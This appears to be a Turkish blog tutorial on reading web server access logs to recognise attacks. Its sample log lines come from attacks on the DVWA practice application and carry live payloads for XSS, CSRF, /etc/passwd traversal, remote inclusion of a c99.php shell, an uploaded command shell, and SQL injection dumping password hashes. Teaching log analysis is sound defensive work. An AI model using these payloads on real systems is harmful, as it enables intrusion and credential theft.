Erişim Log Kayıtları ve Analizi

Örneklerle Erişim Log Kayıtları ve Saldırı Analizleri

Başlangıç seviyesinde bazı örnek log satırları ve yorumlamasına bu kısımda değineceğiz. Daha fazla deneyim için local’de web uygulaması kurarak, saldırılar gerçekleştirip sonrasında erişim log kayıtlarını analiz edebilirsiniz. Unutmayın ki ne kadar çok log dosyası incelerseniz o kadar tecrübe edinirsiniz. Aşağıda birçok örnek log satırı dvwa uygulamasında yapılan denemeler sonucu eklenmiştir.

Yapılan tek istek ve log satırlarına yansıması
test/?…. URL dizinine erişim gerçekleştiriyor ve 4 satır log üretiliyor sunucu tarafında. 2,3 ve 4. satırdaki loglar ilk dizin açılınca bize sayfanın gösterilebilmesi için işleyen dosyalar.(dvwaPage.js,/logo.png vb) Zaten referer kısmına baktığınızda durum daha anlaşılır olacaktır.

88.238.104.122 – – [22/Jun/2017:00:23:27 +0300] “GET test/?name=%3Cscript%3Ealert%28%27Hacked+By+Cenk%27%29%3B%3C%2Fscript%3E+ HTTP/1.1″ 200 1842 “-” “Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0”

88.238.104.122 – – [22/Jun/2017:00:23:27 +0300] “GET test/css/main.css HTTP/1.1” 200 1444 “http://site.com/test/?name=%3Cscript%3Ealert%28%27Hacked+By+Cenk%27%29%3B%3C%2Fscript%3E+” “Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0”

88.238.104.122 – – [22/Jun/2017:00:23:27 +0300] “GET test/js/dvwaPage.js HTTP/1.1” 200 761 “http://site.com/test/?name=%3Cscript%3Ealert%28%27Hacked+By+Cenk%27%29%3B%3C%2Fscript%3E+” “Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0”

88.238.104.122 – – [22/Jun/2017:00:23:27 +0300] “GET test/logo.png HTTP/1.1” 304 180 “http://site.com/test/?name=%3Cscript%3Ealert%28%27Hacked+By+Cenk%27%29%3B%3C%2Fscript%3E+” “Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0”

Yönetimsel Dizinlere Erişim
WordPress login sayfasına oturum açma formundan veriyi POST ediyor ve yönlenerek bir sonraki satırda /wp-admin/ dizinine başarılı erişim gerçekleştiriyor. Web sunucu erişim log kayıtlarında POST metodunda (payload) veri kısmını göremiyoruz.

88.238.104.122 – – [29/May/2017:06:57:31 +0300] “POST /wp-login.php HTTP/1.1″ 302 1150

88.238.104.122 – – [29/May/2017:06:57:31 +0300] “GET /wp-admin/ HTTP/1.1″ 200 12905 

Cross Site Scripting (XSS)
Forma girilen değerler GET metodu ile işlendiği için URL adresinde işlem detayı hakkında bilgi alabiliyoruz. Burada name parametresine değer olarak ekrana popup ekran çıktısı vermeye yarayan javascript kodu girilmiş ve zafiyetin olup olmadığı denenmiş.

88.238.104.122 – – [22/Jun/2017:00:23:27 +0300] “GET test/?name=%3Cscript%3Ealert%28%27Hacked+By+Cenk%27%29%3B%3C%2Fscript%3E+   HTTP/1.1″ 200 1842 “-” “Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0”

Cross Site Request Forgery ( CSRF)
Siteler arası istek sahteciliği gerçekleştirme.

88.238.104.122 – – [22/Jun/2017:00:35:52 +0300] “GET test/?password_new=123456&password_conf=123456&Change=Change HTTP/1.1″ 200 1834 “http://site.com/test” “Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0”

Local File Inclusion (LFI) & (Directory Traversal)
Özetle bu zafiyet: Localdeki dosyayı görüntüleme ve erişim sağlama.

88.238.104.122 – – [22/Jun/2017:00:40:00 +0300] “GET test/?page=../../../../../etc/passwd HTTP/1.1″ 200 1661 “-” “Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0”

88.238.104.122 – – [22/Jun/2017:00:40:03 +0300] “GET test/?page=../../../../../../etc/passwd HTTP/1.1″ 200 2223 “-” “Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0”

Remote File Inclusion (RFI)
Özetle bu zafiyet: Uzak sunucudan dosya çağırma / dahil etme.

88.238.104.122 – – [22/Jun/2017:00:42:19 +0300] “GET test/?page=http://www.site.com/c99.php HTTP/1.1″ 200 1686 “-” “Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0”

File Upload Zafiyeti
Upload dizininde bir form vb. üzerinden post isteği gerçekleşmiş. Sonrasında calistir.php adlı bir dosyaya başarılı erişim gerçekleştirilmiş. calistir.php dosyasına listeleme komutu ls girilmiş ve dizindeki dosyalar listelenmiş. Sonrasında echo komutu ile içerisinde “hacked by cenk” yazan hacked.php adlı bir dosya oluşturulmuş.

88.238.104.122 – – [22/Jun/2017:00:44:12 +0300] “POST /test/upload/ HTTP/1.1″ 200 1856 “http://site.com/test/upload/” “Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0”

88.238.104.122 – – [22/Jun/2017:00:44:27 +0300] “GET /uploads/calistir.php HTTP/1.1″ 200 628 “-” “Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0”

88.238.104.122 – – [22/Jun/2017:00:44:42 +0300] “GET /uploads/calistir.php?pCommand=cd+..%2F+%7C+lsHTTP/1.1″ 200 648 “http://site.com/test/uploads/calistir.php?pCommand=ls+-l” “Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0”

88.238.104.122 – – [22/Jun/2017:00:45:07 +0300]
“GET /uploads/calistir.php?pCommand=echo+%22hacked+by+cenk%22+%3E+hacked.php HTTP/1.1″ 200 628 “http://site.com/test//uploads/calistir.php?pCommand=cd+..%2F+%7C+ls” “Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0”

SQL Injection
URL satırında gerçekleştirilen (GET) bir SQL Injection saldırısının örnek çıktıları aşağıda gösterilmiştir.

88.238.104.1** – – [22/Jun/2017:00:51:20 +0300] “GET /test/?id=99%27+or+%271%27+%3D+%271%27+UNION+Select+1%2Cgroup_concat%28 user%2C0x3b%2Cpassword%2C0x0a%29+from+dvwa.users+%23&Submit=Submit HTTP/1.1″ 200 2156 “http://site.com/test/” “Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0”

88.238.104.1** – – [22/Jun/2017:00:51:56 +0300] “GET /test/?id=99%27+or+%271%27+%3D+%271%27+UNION+Select+1%2Cversion%28%29+%23+ &Submit=Submit HTTP/1.1″ 200 1975 “http://site.com/test/?id=99%27+or+%271%27+%3D+%271%27+UNION+Select+1%2Cgroup_concat%28user% 2C0x3b%2Cpassword%2C0x0a%29+from+dvwa.users+%23&Submit=Submit” “Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0”

Brute Force
Kullanıcı adı şifre girişi form ekranında POST edilen veri ve erişim log kayıtlarında örnek bir çıktısı.

Command Injection
Saldırgan başarılı olduysa windows ve linux komut satırı ekranında çalıştırılabilecek komutları enjekte edecektir. cat, echo, dir, ls , whoami vs. vs.

88.238.104.122- – [22/Jun/2017:01:16:20 +0300] “POST test/ HTTP/1.1” 200 1892 “http://site.com/test” “Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0”

88.238.104.122 – – [22/Jun/2017:01:16:45 +0300] “POST test/ HTTP/1.1” 200 1796 “http://site.com/test/” “Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0”

Site Footer